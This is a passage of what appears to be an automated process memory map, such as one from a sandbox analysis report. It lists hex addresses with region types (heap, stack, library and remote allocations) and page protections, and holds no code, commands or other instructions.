trusted library allocation
|
page read and write
|
||
526E000
|
stack
|
page read and write
|
||
58F2000
|
trusted library allocation
|
page read and write
|
||
6D40000
|
heap
|
page read and write
|
||
6B90000
|
heap
|
page read and write
|
||
5330000
|
heap
|
page execute and read and write
|
||
51AB000
|
trusted library allocation
|
page read and write
|
||
549E000
|
stack
|
page read and write
|
||
4E9D000
|
trusted library allocation
|
page execute and read and write
|
||
8F4D000
|
stack
|
page read and write
|
||
8104000
|
heap
|
page read and write
|
||
7B90000
|
trusted library allocation
|
page read and write
|
||
6BB0000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
5191000
|
trusted library allocation
|
page read and write
|
||
6B0E000
|
stack
|
page read and write
|
||
4BC8000
|
trusted library allocation
|
page read and write
|
||
8660000
|
trusted library allocation
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
7F5A000
|
trusted library allocation
|
page read and write
|
||
88E0000
|
trusted library allocation
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
5000000
|
heap
|
page read and write
|
||
7C07000
|
heap
|
page read and write
|
||
7F3000
|
trusted library allocation
|
page execute and read and write
|
||
297B000
|
heap
|
page read and write
|
||
88CE000
|
trusted library allocation
|
page read and write
|
||
297C000
|
heap
|
page read and write
|
||
87C000
|
stack
|
page read and write
|
||
838F000
|
trusted library allocation
|
page read and write
|
||
46A2000
|
trusted library allocation
|
page read and write
|
||
746D000
|
stack
|
page read and write
|
||
4B2000
|
unkown
|
page readonly
|
||
7B00000
|
trusted library allocation
|
page execute and read and write
|
||
88C0000
|
trusted library allocation
|
page read and write
|
||
8AE2000
|
heap
|
page read and write
|
||
7C32000
|
trusted library allocation
|
page read and write
|
||
51EB000
|
trusted library allocation
|
page read and write
|
||
2A3A000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
DDD000
|
stack
|
page read and write
|
||
697F000
|
stack
|
page read and write
|
||
3405000
|
heap
|
page read and write
|
||
3557000
|
heap
|
page read and write
|
||
3352000
|
heap
|
page read and write
|
||
895D000
|
stack
|
page read and write
|
||
88CF000
|
stack
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
6F9B0000
|
unkown
|
page readonly
|
||
E2E000
|
stack
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
7C89000
|
heap
|
page read and write
|
||
77CA000
|
heap
|
page read and write
|
||
4EEE000
|
stack
|
page read and write
|
||
5894000
|
trusted library allocation
|
page read and write
|
||
7BD6000
|
heap
|
page read and write
|
||
89D0000
|
trusted library allocation
|
page execute and read and write
|
||
801E000
|
stack
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
78FE000
|
stack
|
page read and write
|
||
534E000
|
trusted library allocation
|
page read and write
|
||
359E000
|
stack
|
page read and write
|
||
8EAA000
|
trusted library allocation
|
page read and write
|
||
4330000
|
remote allocation
|
page read and write
|
||
51EE000
|
stack
|
page read and write
|
||
C18000
|
heap
|
page read and write
|
||
60CA000
|
trusted library allocation
|
page read and write
|
||
89E9000
|
trusted library allocation
|
page read and write
|
||
6561000
|
trusted library allocation
|
page read and write
|
||
756B000
|
stack
|
page read and write
|
||
6371000
|
trusted library allocation
|
page read and write
|
||
2C13000
|
heap
|
page read and write
|
||
743D000
|
stack
|
page read and write
|
||
75ED000
|
stack
|
page read and write
|
||
77B3000
|
heap
|
page read and write
|
||
7833000
|
heap
|
page read and write
|
||
7A00000
|
heap
|
page read and write
|
||
7D40000
|
trusted library allocation
|
page read and write
|
||
8CD0000
|
trusted library allocation
|
page read and write
|
||
7F50000
|
trusted library allocation
|
page read and write
|
||
C92000
|
heap
|
page read and write
|
||
6E2D000
|
stack
|
page read and write
|
||
29EE000
|
stack
|
page read and write
|
||
8050000
|
heap
|
page read and write
|
||
79CE000
|
stack
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
8CCE000
|
stack
|
page read and write
|
||
6F07000
|
heap
|
page read and write
|
||
3625000
|
trusted library allocation
|
page execute and read and write
|
||
8B6A000
|
heap
|
page read and write
|
||
4D1B000
|
trusted library allocation
|
page read and write
|
||
2A5E000
|
stack
|
page read and write
|
||
698D000
|
stack
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
6F80000
|
trusted library allocation
|
page read and write
|
||
6260000
|
trusted library allocation
|
page read and write
|
||
4D4D000
|
trusted library allocation
|
page read and write
|
||
2985000
|
heap
|
page read and write
|
||
73AB000
|
stack
|
page read and write
|
||
7CAE000
|
heap
|
page read and write
|
||
7911000
|
heap
|
page read and write
|
||
5010000
|
trusted library allocation
|
page read and write
|
||
6B80000
|
heap
|
page read and write
|
||
680A000
|
stack
|
page read and write
|
||
873E000
|
trusted library allocation
|
page read and write
|
||
85B0000
|
heap
|
page read and write
|
||
42DD000
|
stack
|
page read and write
|
||
AA0000
|
trusted library allocation
|
page read and write
|
||
8D8E000
|
stack
|
page read and write
|
||
57BE000
|
trusted library allocation
|
page read and write
|
||
5062000
|
trusted library allocation
|
page read and write
|
||
45A6000
|
trusted library allocation
|
page read and write
|
||
E48000
|
heap
|
page read and write
|
||
775E000
|
stack
|
page read and write
|
||
77C0000
|
heap
|
page read and write
|
||
8B6E000
|
stack
|
page read and write
|
||
5B9E000
|
direct allocation
|
page read and write
|
||
276E000
|
stack
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
68C62000
|
unkown
|
page readonly
|
||
299D000
|
heap
|
page read and write
|
||
7A81000
|
heap
|
page read and write
|
||
147F000
|
stack
|
page read and write
|
||
7ED0000
|
trusted library allocation
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
2D65000
|
heap
|
page read and write
|
||
297B000
|
heap
|
page read and write
|
||
68FB000
|
stack
|
page read and write
|
||
788E000
|
heap
|
page read and write
|
||
80B7000
|
heap
|
page read and write
|
||
8020000
|
trusted library allocation
|
page execute and read and write
|
||
33EE000
|
unkown
|
page read and write
|
||
CCE000
|
stack
|
page read and write
|
||
7063000
|
heap
|
page read and write
|
||
2A2B000
|
trusted library allocation
|
page read and write
|
||
3440000
|
heap
|
page read and write
|
||
5493000
|
trusted library allocation
|
page read and write
|
||
70DA000
|
heap
|
page read and write
|
||
835D000
|
stack
|
page read and write
|
||
7CB4000
|
heap
|
page read and write
|
||
4D28000
|
trusted library allocation
|
page read and write
|
||
7AE0000
|
trusted library allocation
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
540D000
|
trusted library allocation
|
page read and write
|
||
80BB000
|
direct allocation
|
page read and write
|
||
86B0000
|
heap
|
page read and write
|
||
C58000
|
heap
|
page read and write
|
||
6DBF000
|
stack
|
page read and write
|
||
6B8A000
|
stack
|
page read and write
|
||
820000
|
trusted library allocation
|
page read and write
|
||
821E000
|
stack
|
page read and write
|
||
288F000
|
stack
|
page read and write
|
||
4EFC000
|
unkown
|
page readonly
|
||
6D20000
|
trusted library section
|
page read and write
|
||
6569000
|
trusted library allocation
|
page read and write
|
||
7B50000
|
trusted library allocation
|
page read and write
|
||
D8E000
|
stack
|
page read and write
|
||
538E000
|
stack
|
page read and write
|
||
4CF9000
|
trusted library allocation
|
page read and write
|
||
7D6D000
|
stack
|
page read and write
|
||
7A10000
|
trusted library allocation
|
page read and write
|
||
5712000
|
trusted library allocation
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
48AF000
|
stack
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
6031000
|
trusted library allocation
|
page read and write
|
||
6C7D000
|
stack
|
page read and write
|
||
80DD000
|
heap
|
page read and write
|
||
7000000
|
trusted library allocation
|
page read and write
|
||
7AE0000
|
heap
|
page read and write
|
||
54D5000
|
trusted library allocation
|
page read and write
|
||
86DB000
|
trusted library allocation
|
page read and write
|
||
8BCD000
|
stack
|
page read and write
|
||
2FF7000
|
stack
|
page read and write
|
||
6E70000
|
heap
|
page read and write
|
||
73F2000
|
trusted library allocation
|
page read and write
|
||
34F9000
|
heap
|
page read and write
|
||
87D0000
|
trusted library allocation
|
page read and write
|
||
3470000
|
trusted library allocation
|
page read and write
|
||
865E000
|
stack
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
791E000
|
heap
|
page read and write
|
||
3323000
|
trusted library allocation
|
page execute and read and write
|
||
8C8000
|
heap
|
page read and write
|
||
7520000
|
heap
|
page read and write
|
||
9F0000
|
heap
|
page read and write
|
||
10A8000
|
heap
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
729000
|
trusted library allocation
|
page read and write
|
||
6CED000
|
stack
|
page read and write
|
||
7E0E000
|
stack
|
page read and write
|
||
711D000
|
heap
|
page read and write
|
||
4A55000
|
trusted library allocation
|
page read and write
|
||
6EF5000
|
heap
|
page read and write
|
||
7D80000
|
trusted library allocation
|
page read and write
|
||
89A0000
|
heap
|
page read and write
|
||
7BCE000
|
stack
|
page read and write
|
||
797000
|
stack
|
page read and write
|
||
4D2A000
|
trusted library allocation
|
page read and write
|
||
4D4A000
|
trusted library allocation
|
page read and write
|
||
334C000
|
heap
|
page read and write
|
||
7120000
|
trusted library allocation
|
page execute and read and write
|
||
550D000
|
trusted library allocation
|
page read and write
|
||
73C0000
|
trusted library allocation
|
page read and write
|
||
7B91000
|
heap
|
page read and write
|
||
4DE0000
|
heap
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
7000000
|
heap
|
page execute and read and write
|
||
2C06000
|
heap
|
page read and write
|
||
6E7E000
|
stack
|
page read and write
|
||
7F00000
|
trusted library allocation
|
page read and write
|
||
7EF18000
|
trusted library allocation
|
page execute and read and write
|
||
4825000
|
heap
|
page execute and read and write
|
||
568C000
|
heap
|
page read and write
|
||
ADE000
|
stack
|
page read and write
|
||
532A000
|
trusted library allocation
|
page read and write
|
||
6D40000
|
trusted library allocation
|
page read and write
|
||
8640000
|
heap
|
page read and write
|
||
3336000
|
heap
|
page read and write
|
||
4175000
|
trusted library allocation
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
6FB0000
|
trusted library allocation
|
page read and write
|
||
50E0000
|
heap
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
4D95000
|
trusted library allocation
|
page read and write
|
||
5E7A000
|
trusted library allocation
|
page read and write
|
||
78E7000
|
heap
|
page read and write
|
||
109E000
|
stack
|
page read and write
|
||
4F4E000
|
stack
|
page read and write
|
||
34A0000
|
heap
|
page read and write
|
||
89B0000
|
trusted library allocation
|
page read and write
|
||
5370000
|
heap
|
page read and write
|
||
5164000
|
trusted library allocation
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
70D7000
|
heap
|
page read and write
|
||
E5F000
|
stack
|
page read and write
|
||
6BEB000
|
stack
|
page read and write
|
||
7C80000
|
heap
|
page read and write
|
||
4CE6000
|
trusted library allocation
|
page read and write
|
||
CEC000
|
heap
|
page read and write
|
||
4CE5000
|
trusted library allocation
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page read and write
|
||
3570000
|
heap
|
page read and write
|
||
4BF0000
|
trusted library allocation
|
page read and write
|
||
351D000
|
stack
|
page read and write
|
||
AD0000
|
trusted library allocation
|
page read and write
|
||
35BE000
|
stack
|
page read and write
|
||
7879000
|
heap
|
page read and write
|
||
E1A000
|
heap
|
page read and write
|
||
3610000
|
heap
|
page read and write
|
||
47FC000
|
unkown
|
page readonly
|
||
5167000
|
trusted library allocation
|
page read and write
|
||
298B000
|
heap
|
page read and write
|
||
DDD000
|
stack
|
page read and write
|
||
7C9B000
|
trusted library allocation
|
page read and write
|
||
86EE000
|
stack
|
page read and write
|
||
3300000
|
trusted library allocation
|
page read and write
|
||
7D50000
|
trusted library allocation
|
page read and write
|
||
53B6000
|
trusted library allocation
|
page read and write
|
||
4CFE000
|
trusted library allocation
|
page read and write
|
||
54C000
|
stack
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
349C000
|
stack
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
806C000
|
heap
|
page read and write
|
||
8D2D000
|
stack
|
page read and write
|
||
7C6E000
|
stack
|
page read and write
|
||
8068000
|
heap
|
page read and write
|
||
33E0000
|
trusted library allocation
|
page execute and read and write
|
||
AA3000
|
trusted library allocation
|
page execute and read and write
|
||
3650000
|
trusted library allocation
|
page read and write
|
||
5525000
|
trusted library allocation
|
page read and write
|
||
720000
|
trusted library allocation
|
page read and write
|
||
4D5D000
|
trusted library allocation
|
page read and write
|
||
88B0000
|
heap
|
page read and write
|
||
8030000
|
trusted library allocation
|
page read and write
|
||
7AED000
|
stack
|
page read and write
|
||
4D29000
|
trusted library allocation
|
page read and write
|
||
709E000
|
stack
|
page read and write
|
||
7CFD000
|
stack
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
4800000
|
heap
|
page execute and read and write
|
||
514B000
|
heap
|
page read and write
|
||
4D2E000
|
trusted library allocation
|
page read and write
|
||
4498000
|
trusted library allocation
|
page read and write
|
||
7B3E000
|
stack
|
page read and write
|
||
8ABE000
|
stack
|
page read and write
|
||
4CE6000
|
trusted library allocation
|
page read and write
|
||
D0F000
|
stack
|
page read and write
|
||
8C10000
|
trusted library allocation
|
page read and write
|
||
5000000
|
heap
|
page execute and read and write
|
||
88AF000
|
stack
|
page read and write
|
||
4D27000
|
trusted library allocation
|
page read and write
|
||
7EC0000
|
trusted library allocation
|
page read and write
|
||
7BDD000
|
heap
|
page read and write
|
||
349A000
|
trusted library allocation
|
page execute and read and write
|
||
8730000
|
trusted library allocation
|
page read and write
|
||
6A8B000
|
stack
|
page read and write
|
||
5EB1000
|
trusted library allocation
|
page read and write
|
||
2B80000
|
heap
|
page read and write
|
||
6381000
|
trusted library allocation
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
53E000
|
stack
|
page read and write
|
||
7680000
|
heap
|
page read and write
|
||
75AE000
|
stack
|
page read and write
|
||
7A39000
|
heap
|
page read and write
|
||
7C12000
|
heap
|
page read and write
|
||
865E000
|
stack
|
page read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
4E93000
|
trusted library allocation
|
page execute and read and write
|
||
7BF9000
|
heap
|
page read and write
|
||
65C8000
|
trusted library allocation
|
page read and write
|
||
4D37000
|
trusted library allocation
|
page read and write
|
||
514E000
|
heap
|
page read and write
|
||
56B5000
|
trusted library allocation
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
7A9E000
|
stack
|
page read and write
|
||
5D2000
|
unkown
|
page execute and read and write
|
||
5078000
|
trusted library allocation
|
page read and write
|
||
11A0000
|
heap
|
page read and write
|
||
5371000
|
trusted library allocation
|
page read and write
|
||
81DE000
|
stack
|
page read and write
|
||
73A0000
|
trusted library allocation
|
page read and write
|
||
6191000
|
trusted library allocation
|
page read and write
|
||
8A8E000
|
stack
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
56FC000
|
trusted library allocation
|
page read and write
|
||
4D3F000
|
trusted library allocation
|
page read and write
|
||
7EC0000
|
heap
|
page read and write
|
||
3569000
|
trusted library allocation
|
page read and write
|
||
89EE000
|
stack
|
page read and write
|
||
4CE6000
|
trusted library allocation
|
page read and write
|
||
356E000
|
stack
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
4CE5000
|
trusted library allocation
|
page read and write
|
||
58FB000
|
trusted library allocation
|
page read and write
|
||
7C79000
|
heap
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
718000
|
heap
|
page read and write
|
||
35A2000
|
heap
|
page read and write
|
||
B74000
|
trusted library allocation
|
page read and write
|
||
8360000
|
trusted library allocation
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
4D1C000
|
trusted library allocation
|
page read and write
|
||
7B8D000
|
stack
|
page read and write
|
||
5381000
|
trusted library allocation
|
page read and write
|
||
4F70000
|
heap
|
page execute and read and write
|
||
4D43000
|
trusted library allocation
|
page read and write
|
||
886E000
|
stack
|
page read and write
|
||
522F000
|
stack
|
page read and write
|
||
82DE000
|
stack
|
page read and write
|
||
C7C000
|
heap
|
page read and write
|
||
7BF0000
|
heap
|
page read and write
|
||
25A1000
|
remote allocation
|
page execute read
|
||
3640000
|
trusted library allocation
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
7ADE000
|
stack
|
page read and write
|
||
8E52000
|
trusted library allocation
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
58D2000
|
trusted library allocation
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
||
5695000
|
heap
|
page read and write
|
||
6DAF000
|
direct allocation
|
page read and write
|
||
47F2000
|
unkown
|
page execute read
|
||
439E000
|
stack
|
page read and write
|
||
2971000
|
trusted library allocation
|
page read and write
|
||
5185000
|
trusted library allocation
|
page read and write
|
||
4D10000
|
trusted library allocation
|
page read and write
|
||
545E000
|
stack
|
page read and write
|
||
8002000
|
trusted library allocation
|
page read and write
|
||
73B0000
|
trusted library allocation
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
3362000
|
trusted library allocation
|
page read and write
|
||
825000
|
trusted library allocation
|
page execute and read and write
|
||
3319000
|
trusted library allocation
|
page read and write
|
||
70AD000
|
stack
|
page read and write
|
||
53C000
|
stack
|
page read and write
|
||
89AD000
|
stack
|
page read and write
|
||
8B6C000
|
heap
|
page read and write
|
||
10A0000
|
heap
|
page read and write
|
||
60A000
|
heap
|
page read and write
|
||
6BBF000
|
stack
|
page read and write
|
||
4BA9000
|
trusted library allocation
|
page read and write
|
||
7F90000
|
trusted library allocation
|
page read and write
|
||
78E3000
|
heap
|
page read and write
|
||
C27000
|
heap
|
page read and write
|
||
BA2000
|
trusted library allocation
|
page read and write
|
||
35A7000
|
heap
|
page read and write
|
||
74A5000
|
heap
|
page execute and read and write
|
||
6CA0000
|
trusted library allocation
|
page read and write
|
||
4CF6000
|
trusted library allocation
|
page read and write
|
||
47ED000
|
stack
|
page read and write
|
||
54A0000
|
heap
|
page execute and read and write
|
||
56E9000
|
trusted library allocation
|
page read and write
|
||
E8E000
|
stack
|
page read and write
|
||
7A0E000
|
stack
|
page read and write
|
||
4C9A000
|
trusted library allocation
|
page read and write
|
||
9040000
|
trusted library allocation
|
page read and write
|
||
4F70000
|
heap
|
page read and write
|
||
8ACE000
|
stack
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
53A3000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
7C6C000
|
heap
|
page read and write
|
||
E1F000
|
heap
|
page read and write
|
||
351E000
|
heap
|
page read and write
|
||
870E000
|
stack
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
2990000
|
heap
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
10D0000
|
heap
|
page read and write
|
||
6F80000
|
trusted library allocation
|
page read and write
|
||
4CED000
|
trusted library allocation
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
551D000
|
trusted library allocation
|
page read and write
|
||
2A42000
|
trusted library allocation
|
page read and write
|
||
5580000
|
heap
|
page read and write
|
||
C1E000
|
stack
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
7B60000
|
trusted library allocation
|
page read and write
|
||
88F0000
|
trusted library allocation
|
page execute and read and write
|
||
76FE000
|
stack
|
page read and write
|
||
7F510000
|
trusted library allocation
|
page execute and read and write
|
||
809F000
|
heap
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
751B000
|
stack
|
page read and write
|
||
726B000
|
stack
|
page read and write
|
||
34E0000
|
heap
|
page execute and read and write
|
||
805E000
|
stack
|
page read and write
|
||
894E000
|
stack
|
page read and write
|
||
D9F000
|
stack
|
page read and write
|
||
4D2E000
|
trusted library allocation
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
4CE3000
|
trusted library allocation
|
page read and write
|
||
32BF000
|
stack
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
4D48000
|
trusted library allocation
|
page read and write
|
||
798E000
|
stack
|
page read and write
|
||
D78000
|
heap
|
page read and write
|
||
5254000
|
trusted library allocation
|
page read and write
|
||
7670000
|
heap
|
page read and write
|
||
6AB000
|
heap
|
page read and write
|
||
7380000
|
direct allocation
|
page read and write
|
||
736A000
|
stack
|
page read and write
|
||
7055000
|
heap
|
page execute and read and write
|
||
6F3F000
|
stack
|
page read and write
|
||
8BAE000
|
stack
|
page read and write
|
||
4C4C000
|
stack
|
page read and write
|
||
5149000
|
heap
|
page read and write
|
||
8E95000
|
trusted library allocation
|
page read and write
|
||
356F000
|
heap
|
page read and write
|
||
45C0000
|
trusted library allocation
|
page read and write
|
||
4D36000
|
trusted library allocation
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
887E000
|
stack
|
page read and write
|
||
3554000
|
heap
|
page read and write
|
||
5123000
|
heap
|
page read and write
|
||
4CF8000
|
trusted library allocation
|
page read and write
|
||
80E6000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
6C10000
|
heap
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
B18000
|
heap
|
page read and write
|
||
3551000
|
heap
|
page read and write
|
||
323F000
|
stack
|
page read and write
|
||
7AFD000
|
stack
|
page read and write
|
||
7EC0000
|
trusted library allocation
|
page read and write
|
||
890B000
|
trusted library allocation
|
page read and write
|
||
7BFB000
|
trusted library allocation
|
page read and write
|
||
71C0000
|
trusted library allocation
|
page read and write
|
||
7EF0000
|
trusted library allocation
|
page read and write
|
||
87C9000
|
trusted library allocation
|
page read and write
|
||
5611000
|
trusted library allocation
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
5550000
|
heap
|
page read and write
|
||
72CE000
|
stack
|
page read and write
|
||
762D000
|
stack
|
page read and write
|
||
4D45000
|
trusted library allocation
|
page read and write
|
||
514F000
|
heap
|
page read and write
|
||
6FF0000
|
trusted library allocation
|
page read and write
|
||
4FFC000
|
stack
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
57A7000
|
trusted library allocation
|
page read and write
|
||
90BD000
|
stack
|
page read and write
|
||
5070000
|
trusted library allocation
|
page read and write
|
||
E6E000
|
stack
|
page read and write
|
||
4CEE000
|
trusted library allocation
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
65E000
|
heap
|
page read and write
|
||
4CF9000
|
trusted library allocation
|
page read and write
|
||
3340000
|
trusted library allocation
|
page read and write
|
||
7F00000
|
trusted library allocation
|
page read and write
|
||
8C20000
|
trusted library allocation
|
page read and write
|
||
D1E000
|
stack
|
page read and write
|
||
7390000
|
trusted library allocation
|
page read and write
|
||
978F000
|
stack
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
3328000
|
heap
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page execute and read and write
|
||
5D4000
|
trusted library allocation
|
page read and write
|
||
88C000
|
stack
|
page read and write
|
||
4CE9000
|
trusted library allocation
|
page read and write
|
||
73DE000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
8C8E000
|
stack
|
page read and write
|
||
9030000
|
trusted library allocation
|
page read and write
|
||
8ED0000
|
trusted library allocation
|
page read and write
|
||
29A5000
|
heap
|
page read and write
|
||
54C5000
|
trusted library allocation
|
page read and write
|
||
8B4E000
|
stack
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
33D0000
|
heap
|
page readonly
|
||
2E36000
|
heap
|
page read and write
|
||
86DE000
|
trusted library allocation
|
page read and write
|
||
4DE1000
|
heap
|
page read and write
|
||
6EC0000
|
heap
|
page read and write
|
||
5017000
|
heap
|
page read and write
|
||
7B80000
|
heap
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
4F2E000
|
stack
|
page read and write
|
||
7ABE000
|
stack
|
page read and write
|
||
837A000
|
trusted library allocation
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
7A72000
|
heap
|
page read and write
|
||
7A5D000
|
stack
|
page read and write
|
||
811E000
|
stack
|
page read and write
|
||
7A67000
|
heap
|
page read and write
|
||
8720000
|
heap
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
2B3F000
|
stack
|
page read and write
|
||
70CE000
|
heap
|
page read and write
|
||
88E0000
|
trusted library allocation
|
page execute and read and write
|
||
9028000
|
trusted library allocation
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
43D000
|
stack
|
page read and write
|
||
BF8000
|
trusted library allocation
|
page read and write
|
||
7ACB000
|
heap
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
4CED000
|
trusted library allocation
|
page read and write
|
||
7CFE000
|
stack
|
page read and write
|
||
7A2E000
|
stack
|
page read and write
|
||
5EB9000
|
trusted library allocation
|
page read and write
|
||
710D000
|
stack
|
page read and write
|
||
3695000
|
trusted library allocation
|
page execute and read and write
|
||
873B000
|
trusted library allocation
|
page read and write
|
||
4D06000
|
trusted library allocation
|
page read and write
|
||
5154000
|
heap
|
page read and write
|
||
4D25000
|
trusted library allocation
|
page read and write
|
||
EE4000
|
trusted library allocation
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
8AB8000
|
heap
|
page read and write
|
||
7470000
|
trusted library allocation
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
7EE0000
|
trusted library allocation
|
page read and write
|
||
890E000
|
stack
|
page read and write
|
||
698E000
|
stack
|
page read and write
|
||
7B01000
|
heap
|
page read and write
|
||
76ED000
|
stack
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
3571000
|
heap
|
page read and write
|
||
3690000
|
heap
|
page read and write
|
||
BEE000
|
stack
|
page read and write
|
||
8390000
|
trusted library allocation
|
page read and write
|
||
4CF8000
|
trusted library allocation
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
69BD000
|
stack
|
page read and write
|
||
78D7000
|
heap
|
page read and write
|
||
8A00000
|
trusted library allocation
|
page read and write
|
||
55A5000
|
heap
|
page read and write
|
||
3663000
|
trusted library allocation
|
page execute and read and write
|
||
280E000
|
stack
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
45BA000
|
trusted library allocation
|
page execute and read and write
|
||
3320000
|
heap
|
page read and write
|
||
85C0000
|
heap
|
page read and write
|
||
A0D000
|
heap
|
page read and write
|
||
4CFA000
|
trusted library allocation
|
page read and write
|
||
575D000
|
trusted library allocation
|
page read and write
|
||
53D2000
|
trusted library allocation
|
page read and write
|
||
14D000
|
stack
|
page read and write
|
||
BB7000
|
heap
|
page read and write
|
||
8C4E000
|
stack
|
page read and write
|
||
330C000
|
heap
|
page read and write
|
||
4F40000
|
trusted library allocation
|
page read and write
|
||
44EC000
|
stack
|
page read and write
|
||
8C00000
|
trusted library allocation
|
page read and write
|
||
781F000
|
stack
|
page read and write
|
||
6A18000
|
heap
|
page read and write
|
||
53EA000
|
trusted library allocation
|
page read and write
|
||
8D4E000
|
stack
|
page read and write
|
||
4D46000
|
trusted library allocation
|
page read and write
|
||
7E7B000
|
trusted library allocation
|
page read and write
|
||
78D0000
|
heap
|
page read and write
|
||
281E000
|
stack
|
page read and write
|
||
3322000
|
heap
|
page read and write
|
||
E80000
|
heap
|
page execute and read and write
|
||
DEC000
|
stack
|
page read and write
|
||
8362000
|
trusted library allocation
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
4D2E000
|
trusted library allocation
|
page read and write
|
||
7C56000
|
heap
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
869F000
|
stack
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
4D0A000
|
trusted library allocation
|
page read and write
|
||
74FE000
|
stack
|
page read and write
|
||
5166000
|
trusted library allocation
|
page read and write
|
||
7CBE000
|
stack
|
page read and write
|
||
6ACE000
|
stack
|
page read and write
|
||
6DD0000
|
trusted library allocation
|
page read and write
|
||
4D34000
|
trusted library allocation
|
page read and write
|
||
4E8C000
|
trusted library allocation
|
page read and write
|
||
ED0000
|
trusted library allocation
|
page read and write
|
||
8058000
|
heap
|
page read and write
|
||
6F62000
|
heap
|
page read and write
|
||
85E0000
|
trusted library allocation
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
297C000
|
heap
|
page read and write
|
||
7310000
|
trusted library allocation
|
page read and write
|
||
34BE000
|
heap
|
page read and write
|
||
2CEA000
|
heap
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
4CE6000
|
trusted library allocation
|
page read and write
|
||
721E000
|
stack
|
page read and write
|
||
4D3D000
|
trusted library allocation
|
page read and write
|
||
7E4D000
|
stack
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
7A74000
|
trusted library allocation
|
page read and write
|
||
48EE000
|
stack
|
page read and write
|
||
3558000
|
heap
|
page read and write
|
||
4928000
|
trusted library allocation
|
page read and write
|
||
2D81000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
5111000
|
heap
|
page read and write
|
||
505B000
|
trusted library allocation
|
page read and write
|
||
7B7E000
|
stack
|
page read and write
|
||
58E1000
|
trusted library allocation
|
page read and write
|
||
7C34000
|
heap
|
page read and write
|
||
2D6B000
|
heap
|
page read and write
|
||
2E3A000
|
heap
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
7189000
|
trusted library allocation
|
page read and write
|
||
3382000
|
heap
|
page read and write
|
||
8B47000
|
heap
|
